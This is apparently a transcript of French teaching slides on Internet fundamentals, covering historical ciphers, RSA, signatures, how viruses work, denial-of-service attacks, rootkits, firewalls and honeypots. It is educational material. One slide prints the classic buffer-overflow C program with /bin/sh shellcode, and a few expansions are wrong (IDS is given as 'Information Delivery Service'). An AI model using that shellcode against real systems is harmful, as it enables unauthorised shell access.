Fondamentaux de l'Internet (FDI)

Slides:



Advertisements
Présentations similaires
Sécurité informatique
Advertisements

Les T.I.C. au service de l’organisation du directeur
CRÉER UNE APPLICATION INTERNET RELIEE A UNE BASE DE DONNEES
Page d accueil.
La sécurité des systèmes informatiques
Sécurisez votre information Quelle sécurité pour votre cabinet comptable?
Botnet, défense en profondeur
Base de la sécurité Internet Formation LIR/AFRINIC Ouaga du 10 au 11 Novembre 2004 Alain Patrick AINA
Sécurité informatique
CORRECTION DU DEVOIR DE SYNTHESE N° 2
Une solution personnalisable et extensible
DUDIN Aymeric MARINO Andrès
Conception de la sécurité pour un réseau Microsoft
ISP/ASP ISP ASP Conclusion DESS Réseaux 2000/2001
Projet SeVeCom (Secure Vehicular Communications)
Vue d'ensemble Implémentation de la sécurité IPSec
Réseaux Privés Virtuels
Les différentes notions associées aux réseaux informatiques :
Chiffrement – Utilisation de GPG
Le piratage informatique
Les virus informatiques
Nadjar Marion LES ANTIVIRUS.
Assistance à distance Parfois on se sent bien seul face à un problème informatique surtout si on n’est qu’un simple utilisateur. Lorsqu'un problème survient.
La configuration Apache 2.2 Lhébergement virtuel.
Département de physique/Infotronique
Cursus des formations informatique Programme
ManageEngine ADSelfService Plus
Service Commun Informatique
SSL (Secure Sockets Layer) (couche de sockets sécurisée)
SECURITE DU SYSTEME D’INFORMATION (SSI)
NSA go home - Comment en pratique crypter ses courriels ? CAESAR Valentin 1 ère année FI-MGP 9/10/2013 Confidential.
CryptoGraphy
1 Sécurité Informatique : Proxy Présenter par : Mounir GRARI.
Le filtrage IP Ahmed Serhrouchni ENST’Paris CNRS.
LES VIRUS INFORMATIQUES.
IDS : Intrusion Detection System
Le protocole FTP.
Fondamentaux de l'Internet (FDI)
Mise en place du routeur DLINK MODELE: DSL-G604T.
Les relations clients - serveurs
Développement dapplications web Authentification, session.
Utilisation des installations informatiques du CERN
Sécurité informatique
RE161 IDS : Intrusion Detection System Le trafic habituel qui entre dans votre réseau sert à : Résoudre des requêtes DNS Accéder à des pages web La messagerie.
Module : Technologies des serveurs réseaux : Les technologies de sécurité Présenter par : Mounir GRARI.
Novembre – Décembre 2005 Version Conclusion État de lart de la sécurité informatique Auteurs : Stéphan GUIDARINI – Consultant Senior Sébastien DESSE.
Les dangers d'Internet (virus et autres)
Le protocole d’authentification
Sécurité Les Virus Logiciels non sollicités et réalisant des opérations malveillantes ou destructrices Typologie –D’application :introduit par recopie.
Expose sur « logiciel teamviewer »
Les virus informatiques
APPRENDRE À SE PRÉMUNIR DES ATTAQUES ET DES MENACES DU WEB Internet et sécurité.
L’identité numérique.
Back Orifice Scénario en 3 étapes - Préparation & envoi - Infection & Installation - Prise de contrôle - Détections Possibles - Net-Based - Host-Based.
1  Pare feu  Antivirus  Chasse aux espions  Anti Spam La Sécurité sur nos ordinateurs PC Zombies : Sur les 600 millions de machines connectées au monde,
Dossier n°1 Structure et Fonctionnement d'un micro-ordinateur.
Auvray Vincent Blanchy François Bonmariage Nicolas Mélon Laurent
Groupe 3 De Greef Didier Oozeer Tommy Piette Marc Renard Guy
Création d’un domaine Il faut :
JeanDo Lénard – Fondamentaux de l'Internet – Hetic –06 Février 2007 page 1 Fondamentaux de l'Internet (FDI) JeanDo Lénard
En route vers le déploiement . . .
3.3 Communication et réseaux informatiques
JeanDo Lénard – Fondamentaux de l'Internet – Hetic –30 Janvier 2007 page 1 Fondamentaux de l'Internet (FDI) JeanDo Lénard
Réalisation d’un logiciel de Chiffrement RSA.
CPI/BTS 2 Programmation Web Les sites dynamiques Prog Web CPI/BTS2 – M. Dravet – 02/10/2003 Dernière modification: 02/10/2003.
Sécurité Informatique
Sécurité des Web Services
Chapitre 8 Protection du trafic réseau à l'aide de la sécurité IPSec et de certificats Module S43.
Travailler dans un environnement numérique évolutif Domaine D1.
Présentation de HelloDoc Mail
Transcription de la présentation:

Fondamentaux de l'Internet (FDI) JeanDo Lénard jdlenard@gmail.com

Thèmes abordés d'ici fin Février (7 séances) Cryptographie Une vielle histoire, quelques codes historiques La cryptographie moderne, principes et utilisations Mise en pratique de techniques, signatures, SSH ... Sécurité Linux Apache et sa configuration Standard et W3C, les navigateurs ... Le développement avec CVS Technologies collaboratives et décentralisées Logiciels libres, licences, brevets, DRM...

Thèmes abordés d'ici fin Février (7 séances) Cryptographie Sécurité Virologie, Les attaques, Se protéger. Linux Apache et sa configuration Standard et W3C, les navigateurs ... Le développement avec CVS Technologies collaboratives et décentralisées Logiciels libres, licences, brevets, DRM...

Thèmes abordés d'ici fin Février (7 séances) Cryptographie Sécurité Linux Qu'est-ce que c'est, pourquoi s'en servir ? Principales distributions Principaux logiciels Utilisation de base, interface graphique, ligne de commande Apache et sa configuration Standard et W3C, les navigateurs ... Le développement avec CVS Technologies collaboratives et décentralisées Logiciels libres, licences, brevets, DRM...

Thèmes abordés d'ici fin Février (7 séances) Cryptographie Sécurité Linux Apache et sa configuration Pourquoi Apache ? Installation Configuration et sécurisation Standard et W3C, les navigateurs ... Le développement avec CVS Technologies collaboratives et décentralisées Logiciels libres, licences, brevets, DRM...

Thèmes abordés d'ici fin Février (7 séances) Cryptographie Sécurité Linux Apache et sa configuration Standard et W3C, les navigateurs ... Les standards sur Internet Légitimité du W3C Respect et tests par rapport aux standards Le développement avec CVS Technologies collaboratives et décentralisées Logiciels libres, licences, brevets, DRM...

Thèmes abordés d'ici fin Février (7 séances) Cryptographie Sécurité Linux Apache et sa configuration Standard et W3C, les navigateurs ... Le développement avec CVS CVS, à quoi ça sert ? Comment travailler avec CVS, seul ou à plusieurs ? Technologies collaboratives et décentralisées Logiciels libres, licences, brevets, DRM...

Thèmes abordés d'ici fin Février (7 séances) Cryptographie Sécurité Linux Apache et sa configuration Standard et W3C, les navigateurs ... Le développement avec CVS Technologies collaboratives et décentralisées Grid Computing Peer to Peer... Logiciels libres, licences, brevets, DRM...

Thèmes abordés d'ici fin Février (7 séances) Cryptographie Sécurité Linux Apache et sa configuration Standard et W3C, les navigateurs ... Le développement avec CVS Technologies collaboratives et décentralisées Logiciels libres, licences, brevets, DRM... Pourquoi des logiciels libres ? Les formes de licences Les brevets logiciels

Cryptographie Aperçu historique Les codes anciens Les codes militaires Exemple pratique de déchiffrage Méthodes modernes de chiffrement Méthodes à clé secrète Méthodes à clé publique RSA PGP Signature électronique Certificat électronique

Cryptographie La crypto, une très vieille histoire avec ... un empereur romain, des historiens grecs et des nihilistes russes Sherlock Holmes, et beaucoup d'autres

Cryptographie La crypto, une très vieille histoire avec ... un empereur romain : Le code de César Le code le plus connu : substituer les lettres en les décalant

Cryptographie A B C D E F G H I J K L M N O P Q R S T U V W X Y Z La crypto, une très vieille histoire avec ... un empereur romain : Le code de César Le code de César sur Internet : Le ROT-13 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z deviennent N O P Q R S T U V W X Y Z A B C D E F G H I J K L M

Cryptographie 1 2 3 4 5 1 A B C D E 2 F G H I,J K 3 L M N O P La crypto, une très vieille histoire avec ... un empereur romain, des historiens grecs et des nihilistes russes 1 2 3 4 5 1 A B C D E d 2 F G H I,J K 3 L M N O P 4 Q R S T U 5 V W X Y Z

Toute la Gaule est occupée ! Cryptographie La crypto, une très vieille histoire avec ... un empereur romain, des historiens grecs et des nihilistes russes Toute la Gaule est occupée ! devient

Toute la Gaule est occupée ! Cryptographie La crypto, une très vieille histoire avec ... un empereur romain, des historiens grecs et des nihilistes russes Toute la Gaule est occupée ! devient 4434454415 3111 2211453115 154344 34131345351515 !

Cryptographie La crypto, une très vieille histoire avec ... un empereur romain, des historiens grecs et des nihilistes russes et Sherlock Holmes (les hommes dansants)

Cryptographie Le chiffre ADFGVX en 1918 A D F G V X A Q Y A L S E La crypto, une histoire plus récente avec ... des militaires... Le chiffre ADFGVX en 1918 A D F G V X A Q Y A L S E D Z C R X H 0 F F O 4 M 8 7 G 3 I T G U K V P D 6 2 N V X 1 5 J 9 W B

Toute la Gaule est occupée ! Cryptographie Toute la Gaule est occupée ! Devient GFFDGVGFAX AGAF GGAFGVAGAX AXAVGF FDDDDDGVVAAXAX ! On choisit une clé (OBELIX) et on reconstruit un tableau O B E L I X G F F D G V G F A X A G A F G G A F G V A G A X A X A V G F F D D D D D G V V A A X A X

FFGFG VFAAX GGFGA GAFVA AGGXX AGVAF DDDDF DVVAA GXXA Cryptographie On classe les colonnes par ordre alphabétique B E I L O X F F G D G V F A A X G G F G A G A F V A A G G X X A G V A F D D D D F D V V A A G X X A On réécrit le message FFGFG VFAAX GGFGA GAFVA AGGXX AGVAF DDDDF DVVAA GXXA

Cryptographie Déchiffrer le message suivant dont la clé est OBELIX gaaxavdddfgfxvgdavdggfddxaagxxvgagafvafggddavg

Cryptographie Déchiffrer le message suivant dont la clé est OBELIX gaaxavdddfgfxvgdavdggfddxaagxxvgagafvafggddavg Reconstruire le premier tableau B E I L O X G A A X A V D D D F G F X V G D A V D G G F D D X A A G X X V G A G A F V A F G G D D A V G

Cryptographie Déchiffrer le message suivant dont la clé est OBELIX gaaxavdddfgfxvgdavdggfddxaagxxvgagafvafggddavg Remettre le tableau dans l'ordre O B E L I X A G A X A V G D D F D F A X V D G V D D G F G D X X A G A X A V G G A F G V A G F D G D A V

Cryptographie Déchiffrer le message suivant dont la clé est OBELIX Comparer les deux tableaux O B E L I X A G A X A V G D D F D F A X V D G V D D G F G D X X A G A X A V G G A F G V A G F D G D A V A D F G V X A Q Y A L S E D Z C R X H 0 F F O 4 M 8 7 G 3 I T G U K V P D 6 2 N V X 1 5 J 9 W B AG = L ; AX = E ; AV = S ..............

Cryptographie Déchiffrer le message suivant dont la clé est OBELIX gaaxavdddfgfxvgdavdggfddxaagxxvgagafvafggddavg devient Les irréductibles gaulois

Ces systèmes de chiffrement ne sont pas fiables. Cryptographie Ces systèmes de chiffrement ne sont pas fiables. Pourquoi ?

Cryptographie Ces systèmes de chiffrement ne sont pas fiables. Il y a que 26 systèmes possibles. C'est beaucoup à la main mais peu pour des ordinateurs. On peut utiliser une approche statistique.

Cryptographie Méthodes modernes de chiffrement Les chiffrements à clé secrète Le téléphone rouge et les diplômates L'algorithme DES et le TDES

Cryptographie Méthodes modernes de chiffrement Les chiffrements à clé secrète Le téléphone rouge et les diplômates L'algorithme DES et le TDES Ces méthodes, si elles peuvent être sûres, ne sont pas utilisables pour les civils. Pourquoi ?

Cryptographie Méthodes modernes de chiffrement Les chiffrements à clé secrète Le téléphone rouge et les diplômates L'algorithme DES et le TDES Ces méthodes, si elles peuvent être sûres, ne sont pas utilisables pour les civils. Pourquoi ? Les civils ne disposent pas de canaux sûrs pour échanger leurs clés.

Cryptographie Méthodes modernes de chiffrement Les chiffrements à clé publique

Cryptographie Méthodes modernes de chiffrement Les chiffrements à clé publique Le principe de Whitfield Diffie et Martin Hellman (1976). On dispose de 2 clés : une clé sert à chiffrer, une clé sert à déchiffrer.

Cryptographie Méthodes modernes de chiffrement Les chiffrements à clé publique Le principe de Whitfield Diffie et Martin Hellman (1976). On dispose de 2 clés : une clé sert à chiffrer (dite clé publique), une clé sert à déchiffrer (dite clé secrète). Le destinataire fournit la clé pour chiffrer. L'émetteur chiffre avec cette clé. Le destinataire déchiffre avec l'autre clé qu'il conserve.

Cryptographie Méthodes modernes de chiffrement Les chiffrements à clé publique Envoi de la clé publique Emetteur Destinataire

Cryptographie Méthodes modernes de chiffrement Les chiffrements à clé publique Envoi de la clé publique Emetteur Destinataire Emetteur chiffre le message avec la clé publique

Cryptographie Méthodes modernes de chiffrement Les chiffrements à clé publique Envoi de la clé publique Emetteur Destinataire Emetteur chiffre le message avec la clé publique Envoi du message chiffré Emetteur Destinataire

Cryptographie Méthodes modernes de chiffrement Les chiffrements à clé publique Envoi de la clé publique Emetteur Destinataire Emetteur chiffre le message avec la clé publique Envoi du message chiffré Emetteur Destinataire Destinataire déchiffre avec la clé secrète Emetteur

Cryptographie Méthodes modernes de chiffrement Les chiffrements à clé publique Reste à trouver comment créer des clés publiques et des clés secrètes !

Cryptographie Méthodes modernes de chiffrement Les chiffrements à clé publique Reste à trouver comment créer des clés publiques et des clés secrètes ! L'algorithme RSA (Rivest Shamir, Adleman), 1977.

Cryptographie Méthodes modernes de chiffrement Les chiffrements à clé publique L'algorithme PGP (Pretty Good Privacy) de Zimmermann, 1991 Compression du message Génération d'une clé de session aléatoire Chiffrement du message avec la clé de session (algo symétrique rapide) Chiffrement de la clé de session avec la clé publique (avec RSA) Envoi du message chiffré et de la clé de session chiffrée Déchiffrement de la clé de session avec la clé secrète (lent) Déchiffrement du message avec la clé de session. (rapide)

Cryptographie Etre sûr de l'expéditeur : La signature électronique Comme tous les messages, les messages électroniques peuvent être signés. Le principe est de créer une signature infalsifiable, mais que mon destinataire pourra reconnaître. Comment ?

Cryptographie Etre sûr de l'expéditeur : La signature électronique Comment ? L'Emetteur chiffre son message M avec sa clé secrète : SE(M) Le message est dit signé. L'Emetteur chiffre le message avec la clé publique du Destinataire : PD(SE(M)) Le message est signé et chiffré. Le Destinataire déchiffre le message avec sa clé privé : SD(PD(SE(M)))=SE(M) Le Destinataire déchiffre le message signé avec la clé publique de l'émetteur : PE(SD(PD(SE(M))))=PE(SE(M))=M

Cryptographie Etre sûr de l'expéditeur : La signature électronique PE(SD(PD(SE(M))))=PE(SE(M))=M Le message n'a pu être lu que par Destinataire car lui-seul a pu utiliser : SD Donc le message provient bien de Emetteur car lui-seul a pu utiliser SE Donc la signature change à chaque message !

Cryptographie Etre sûr du destinataire : Le certificat électronique Le destinataire doit fournir son identité, le certificat. L'objectif est de prouver que la clé publique est bien celle du destinataire. Création du certificat : Le destinataire envoie sa clé publique à un organisme de certification Le destinataire envoie d'autres informations pour valider la clé Après validation, l'organisme calcule un résumé du certificat L'organisme signe ce résumé avec sa clé secrète L'émetteur déchiffre le résumé avec la clé publique de l'organisme Si le résumé déchiffré est correct, le certificat est bon. Donc la clé publique est bonne On est sûr de l'émetteur

Cryptographie Un exemple Allons-y ! Commençons par créer notre paire de clés: Prenons 2 nombres premiers au hasard: p = 29, q = 37 On calcul n = pq = 29 * 37 = 1073 On doit choisir e au hasard tel que e n'ai aucun facteur en commun avec (p-1)(q-1): (p-1)(q-1) = (29-1)(37-1) = 1008 On prend e = 71 On choisit d tel que 71*d mod 1008 = 1 On trouve d = 1079 On a maintenant nos clés : La clé publique est (e,n) = (71,1073)   (=clé d'encryptage) La clé privée est (d,n) = (1079,1073)   (=clé de décryptage)   On va encrypter le message 'HELLO'. On va prendre le code ASCII de chaque caractère et on les met bout à bout: m = 7269767679 Ensuite, il faut découper le message en blocs qui comportent moins de chiffres que n. n comporte 4 chiffres, on va donc découper notre message en blocs de 3 chiffres: 726 976 767 900 (on complète avec des zéros) Ensuite on encrypte chacun de ces blocs: 726^71 mod 1073 = 436 976^71 mod 1073 = 822 767^71 mod 1073 = 825 900^71 mod 1073 = 552 Le message encrypté est 436 822 825 552. On peut le décrypter avec d: 436^1079 mod 1073 = 726 822^1079 mod 1073 = 976 825^1079 mod 1073 = 767 552^1079 mod 1073 = 900 C'est à dire la suite de chiffre 726976767900. On retrouve notre message en clair 72 69 76 76 79 : 'HELLO'.

Virus et virologie Un virus est « un programme qui peut contaminer un autre progr amme en le modifiant pour inclure une partie de lui-même ». Un ver est un virus qui se propage via le réseau (carnet d’adresses ou autres). Il ne se reproduit pas sur les autres fichiers de la machine. Un cheval de Troie est un programme attaché à un autre (le porteur) qui s’exécute quand on lance le porteur. Le plus connu est le Backdoor. Un macro-virus infecte les fichiers des logiciels qui ont un langage de macros (Word, Excel, etc...).

Virus, principes de fontionnement

Virus, principes de fontionnement Exécution d’un programme infecté

Virus, principes de fontionnement Exécution d’un programme infecté Chargement du virus en mémoire

Virus, principes de fontionnement Exécution d’un programme infecté Chargement du virus en mémoire Le virus attend le lancement de nouveaux programmes

Virus, principes de fontionnement Exécution d’un programme infecté Chargement du virus en mémoire Le virus attend le lancement de nouveaux programmes Interception lors du lancement d’un programme

Virus, principes de fontionnement Exécution d’un programme infecté Chargement du virus en mémoire Le virus attend le lancement de nouveaux programmes Interception lors du lancement d’un programme Modification du programme

Virus, principes de fontionnement Exécution d’un programme infecté Chargement du virus en mémoire Le virus attend le lancement de nouveaux programmes Interception lors du lancement d’un programme Modification du programme Lancement du programme normal

Virus, principes de fontionnement 4 fonctions essentielles

Virus, principes de fontionnement 4 fonctions essentielles Fonction de recherche : décider quels fichiers infecter et à quel vitesse - Ne pas déclencher des reproductions trop fréquentes - Se reproduire suffisamment pour être efficace

Virus, principes de fontionnement 4 fonctions essentielles Fonction de recherche : décider quels fichiers infecter et à quel vitesse - Ne pas déclencher des reproductions trop fréquentes - Se reproduire suffisamment pour être efficace Fonction de reproduction : Modification du programme cible - Insertion du code du virus dans la cible - Insertion de l’appel en début de programme

Virus, principes de fontionnement 4 fonctions essentielles Fonction de recherche : décider quels fichiers infecter et à quel vitesse - Ne pas déclencher des reproductions trop fréquentes - Se reproduire suffisamment pour être efficace Fonction de reproduction : Modification du programme cible - Insertion du code du virus dans la cible - Insertion de l’appel en début de programme Fonction de destruction : variées - routine d’activation - actions : ralentissement, messages, destructions...

Virus, principes de fontionnement 4 fonctions essentielles Fonction de recherche : décider quels fichiers infecter et à quel vitesse - Ne pas déclencher des reproductions trop fréquentes - Se reproduire suffisamment pour être efficace Fonction de reproduction : Modification du programme cible - Insertion du code du virus dans la cible - Insertion de l’appel en début de programme Fonction de destruction : variées - routine d’activation - actions : ralentissement, messages, destructions... Fonction de cryptage : rendre le virus indétectable.... - Intégration dans le virus de routine de cryptage de son code - Le second fichier infecté aura une signature différente

Macro-virus Enfin, l’écriture de virus à la portée de tous ! Des logiciels à langage de macros comme Word ou Excel exécute automatiquement des macros lors de leur exécution (AutoOpen, AutoExec, AutoNew, AutoClose, AutoExit). Un fichier Word infecté va modifier ces macros automatiques et les copier dans le modèle global.dot pour infecter pour les fichiers Word. Facile à écrire gràce au Visual Basic. Ils sont à la mode. Difficile à éradiquer car un document infecté peut être sur un disque dur, dans une boîte mail, dans une base de données, etc...

Protection contre les virus Pas de recette miracle, un minimum de bon sens Avoir un anti-virus à jour. Se méfier des pièces jointes dans les mails, voire n’ouvrir une pièce jointe que si l’émetteur du mail (connu) y fait référence dans le corps du message. Activer la visualisation des extensions de fichiers (double extension). Faire des sauvegardes. Utiliser un Firewall pour se protéger des cheveaux de Troie. Ne pas redistribuer les Hoaxes.

Sécurité informatique Pourquoi les systèmes sont-ils vulnérables ? La sécurité coûte chère et les avantages ne sont pas visibles. Les sociétés acceptent de courrir le risque. La politique de sécurité est complexe et basée sur des jugements humains. Les technologies ont toutes des failles. Les utilisateurs ne sont pas conscients des enjeux.

Sécurité informatique Les méthodes d’attaque courantes IP Spoofing : parodier une adresse IP connue pour entrer sur le réseau lorsque l’identification est fondée sur l’adresse IP

Sécurité informatique Les méthodes d’attaque courantes IP Spoofing : parodier une adresse IP connue pour entrer sur le réseau lorsque l’identification est fondée sur l’adresse IP Déni de service (DOS) : Empêcher l’utilisation d’une machine (serveur Web ou de messagerie. Plus facile à mettre en oeuvre. - Localement (en remplissant le disque, nombre de process infini, etc.). - Par le réseau : SYN flood, Flags TCP illégaux, etc.

Sécurité informatique Les méthodes d’attaque courantes DOS par SYN flood : L’attaquant envoie un grand nombre de requètes SYN (demande de connexions). La machine cible doit gérer ce grand nombre dans une liste (SYN_RECV). La machine cible ne fait plus que ça. Parades : L’attaque est visible (netstat –an) indique un grand nombre de ocnnexions en SYN-RECV. Les OS modernes sont protégés. Utiliser un IDS (Information Delivery Service) qui envoie des Resets si trop de SYN.

Sécurité informatique Les méthodes d’attaque courantes Le DDOS (Distributed Denial of Service) : - Très à la mode - Objectif : écrouler la machine cible - L’attaquant utilise plusieurs machines qu’il a piratées (des PC de particuliers connectés sur Internet) Les grands débuts en Février 2000, où Mafiaboy (15 ans) fait tomber les sites de Microsoft, ebay, Amazon, cnn, etc...). Le principe est que plusieurs machines (quelques milliers) émettent toutes des demandes de connexions au serveur. Celui-ci n’est plus occupée qu’à gérer la liste. Plus sur http://staff.washington.edu/dittrich/misc.ddos Intérêts : Le véritable attaquant est caché. On ne peut pas filtrer une adresse d’attaquant.

Sécurité informatique Quantité d’autres méthodes DOS sur les DNS : L’objectif est que la réponse du DNS renvoie l’IP de la machine du pirate pour que l’utilisateur vienne se connecter chez le pirate (de plus en plus difficile à mettre en oeuvre, dernier exploit en 2004 qui a pu faire tomber Microsoft, Google, Yahoo, Apple, Xerox et d’autres). Attaque en SMURF : Prendre l’adresse de la victime et envoyer une trame de type request sur une adresse de diffusion. Toutes les machines actives de la plage d’adresse vont répondre à la machine à attaquer.

Sécurité informatique Quantité d’autres méthodes Les attaques sur la pile IP : Le principe est d’envoyer des paquets IP mal formattés pour planter la pile IP du serveur. Le plus connu est le « ping of death » qui est (était) capable de faire rebooter les machines. (http://www.insecure.org/sploits/ping-o-death.html)

Sécurité informatique Crackage de mots de passe et rootkits Il existe de très bons outils de crackage de mots de passe : - l0phtcrack pour Windows - John the Ripper pour Unix et Wondows (www.openwall.com) Cracker un mot de passe permet ensuite d’installer un Rootkit (la Rolls-Royce du crack) Le rootkit contient en général : - un sniffer pour repérer d’autres machines sur le réseau. - des programmes avec des backdoors pour rentrer sur le système même si le premier accès est fermé. - des remplaçants des commandes courantes. - un outil de nettoyage des logs pour effacer les traces. Il existe des outils de détection (chkrootkit pour Unix, rootkitrevealer Win)

Sécurité informatique Les vulnérabilités applicatives Beaucoup d’applications sont vulnérables pour cause de mauvaise programmation ou de manière volontaire. - Buffer overflow (très courant en C), problèmes de format, entrée utilisateur non contrôlée - Backdoor « oubliées » Beaucoup d’applications ont besoin de sécurité, soit parce qu’elles contiennent des données sensibles (BDD), soit parce qu’elles constituent des points d’entrée (script cgi, etc.).

char shellcode[] = "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa" "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04" "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff" "\xff\xff/bin/sh"; char large_string [128] ; void main () { char buffer [96] ; int i ; long *long_ptr = (long *) large_string ; for (i = 0 ; i < 32 ; i++) *(long_ptr + i) = (int) buffer ; for (i = 0 ; i < strlen (shellcode) ; i++) large_string [i] = shellcode [i] ; strcpy (buffer,large_string) ; }

Sécurité informatique Base de la protection : l’analyse L’outil Nessus (www.nessus.org) est un scanner de serveur qui permet de tester la sécurité d’une machine. Nessus génère des rapports d’analyse de la machine concernée. Nessus dispose de base de données de vulnérabilités à jour. Attention, ces outils peuvent être utilisés aussi par les attaquants ! Il existe donc des outils qui détectent l’utilisation des outils de type Nessus. Ce sont des IDS (Intrusion Dectection Software) comme Snort (www.snort.org)

Sécurité informatique Rapport de résultats de Nessus

Sécurité informatique Notions de Firewalling Un Firewall est un serveur qui a pour objectif : - Protéger le réseau du monde extérieur - Maintenir les utilisateurs à l’intérieur - Restreindre le nombre de machines à surveiller - Protéger les machines qui doivent communiquer avec l’extérieur Il ne protège pas : - contre les attaques venues de l’intérieur - les mots de passe faciles à craquer Deux politiques possibles - Tout interdire, puis autoriser au cas par cas - Tout autoriser, puis interdire au cas par cas

Sécurité informatique Notions de Firewalling Un Firewall contrôle les accès entrants et sortants : - par service : quelles applications demandent un accès - par adresse IP Un Firewall peut filtrer les accès : - sur les paquets : un ordinateur demande un accès au serveur Web sur le port 80, je le laisse passer un ordinateur demande un accès au serveur Web sur le port 25, je l’interdit. - en servant de passerelle : un ordinateur demande un accès au serveur Web sur le port 80, je le laisse passer en le traduisant en accès sur le port 3012. - par application : Relais de messagerie, http, etc.

Sécurité informatique Notions de Firewalling Tout le trafic réseau depuis Internet vers le serveurs visibles (DMZ) passe par le Firewall, comme du LAN vers la DMZ ou du LAN vers Internet. On peut multiplier les Firewalls pour créer des zones étanches.

Sécurité informatique Notions de Firewalling checkpoint : www.checkpoint.com mnf : www.mandriva.com/fr/enterprise/products/mnf2 Le firewall personnel de XP (correct pour un poste de travail simple)

Sécurité informatique Le pot de miel « Honeypot » Le pot de miel (machine faible) a pour objectif d’attirer les mouches (les crackers). On pose sur le réseau (visible depuis Internet ou non) un machine faiblement sécurisée pour distraire le cracker des machines plus sensibles. On étudie ses techniques d’attaque pour protéger les autres machines. On apprend des informations sur lui. On lance la contre-attaque ! Exemple : www.honeyd.org

Sécurité informatique Le pot de miel « Honeypot » Typiquement, un pot de miel est un machine sur laquelle tourne plusieurs systèmes d’exploitation virtuel différents (vmware ou autre). Donc cette machine donne l’impression d’être plusieurs machines Windows simples (serveurs ou PC) ou bien des machines Linux, etc. Un autre serveur apparement sans intérêt surveille le honeypot et collecte des informations sur ceux qui se connecte sur le honeypot. Si un attaquant casse un des machines virtuelles, cela n’a pas d’importance, mais l’attaquant est alors repéré.

Sécurité informatique En administration Limité les accès physiques aux machines Concvoir le réseau avec un « regard sécurité » Fermer les services inutiles ainsi que les comptes utilisateurs inutilisés S’abonner aux listes de diffusion sécurité pour le système et les applications Passer les patches Crypter les informations circulants

Sécurité informatique En cas d’intrusion Débrancher la machine ou non ? Sauvegarder la machine pour l’analyser à froid Reformater le tout et réinstaller une sauvegarde saine Modifier les mots de passe et les clefs de cryptage Ne pas donner d’informations sur ce qui s’est passé Surveiller car l’attaquant reviendra probablement (puisqu’il sait comment entrer.

Sécurité informatique En conclusion Le seul système informatique qui est vraiment sûr est un système éteint et débranché, enfermé dans un blockhaus sous terre, entouré par des gaz mortels et des gardiens hautement payés et armés. Même dans ces conditions, je ne parierais pas ma vie dessus. (c) Gene Spafford, fondateur du Computer Operations, Audit and Security Technology Laboratory